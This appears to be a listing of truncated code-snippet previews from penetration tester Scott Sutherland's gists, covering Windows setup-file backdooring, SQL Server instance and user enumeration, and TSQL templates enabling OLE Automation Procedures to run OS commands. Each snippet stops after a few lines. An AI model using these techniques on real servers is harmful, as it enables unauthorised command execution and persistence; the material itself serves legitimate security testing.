nullbind

Author: Scott Sutherland, 2017
Descript: Summary of how to backdoor an existing setup file in Windows.
Note: Not sure if anyone covered this already? Seems kind of like a Casey Smith thing. 

How to Backdoor Existing Setup Files by Modifying Config Files Stored in RCData

In this example, the lyncsdk.exe will be used. It can be download here: https://www.microsoft.com/en-us/download/details.aspx?id=36824 
lyncentry.exe also works as an example.

Below are some basic instructions.

nullbind

Function Find-DbaSqlInstance
{
    <#

    .SYNOPSIS
    This function can be used to enumerate SQL Server instances using common methods.

    .EXAMPLE
    Check if the provided computer(s) or instance(s) respond to ping.

nullbind

using System;
using System.Text;
using System.Security.Principal;
using System.Runtime.InteropServices;
using Microsoft.Win32;

namespace lsautil
{

    // https://msdn.microsoft.com/en-us/library/microsoft.win32.registry(v=vs.110).aspx

nullbind

# todo
<#
- Note: dependant on PowerUpSQL.
1 - have script accept command or source script as string
    --- have that get bake into the wmi provider method
    --- update the wmi method to execute the provided string as a script block
    --- mod the clr to return the output of the wmi command
- roll into clone of the invoke-sqloscmdclr function so it can scale
- remove wmi cs and dll on client
- remove sql dll cs and dll on client

nullbind

-- This is a TSQL template for executing OS commands through SQL Server using OLE Automation Procedures.

-- Enable Show Advanced Options
sp_configure 'Show Advanced Options',1
RECONFIGURE
GO

-- Enable OLE Automation Procedures
sp_configure 'Ole Automation Procedures',1
RECONFIGURE

nullbind

-- set output directory to install sql server install dir
-- set output file to randomly generate name

-- show advanced options
sp_configure 'show advanced options',1
reconfigure
go

-- turn on ole automation 
sp_configure 'Ole Automation Procedures',1

nullbind

# Script: Find-DbaSqlInstance
# version 0.14.5
# Author: Scott Sutherland, 2018 NetSPI
# Contributions from: Warren F. (Invoke-Parallel), https://gallery.technet.microsoft.com/scriptcenter/List-the-IP-addresses-in-a-60c5bb6b


# ------------------------
# Current feature summary
# ------------------------
# 1 - Import list of IP addresses, computer names, or SQL instances from a file via "-SqlInstanceFile" param - works

nullbind

# This script can be used to extract a list of IIS 6.x HTTP servers from .nessus files.
# Author: Scott Sutherland, NetSPI 2017
# Instructions: Run the script in a directory containing only .nessus files. Super dirty/slow, but functional.

# Create an output table
$outputtbl =New-Object System.Data.DataTable
$outputtbl.Columns.Add("IpAddress") | Out-Null
$outputtbl.Columns.Add("IISVersion") | Out-Null

# Iterate through each host

nullbind

$schedule = new-object -com("Schedule.Service") 
$schedule.connect() 
$tasks = $schedule.getfolder("\").gettasks(0)

$entries = New-Object System.Collections.Generic.List[System.Management.Automation.PSObject]

$tasks | 
ForEach-Object {

    # Get task information

nullbind

select n [id], USER_NAME(n) [user_name]
from ( 
select top 10000 row_number() over(order by t1.number) as N
from   master..spt_values t1 
       cross join master..spt_values t2
) a
where USER_NAME(n) is not null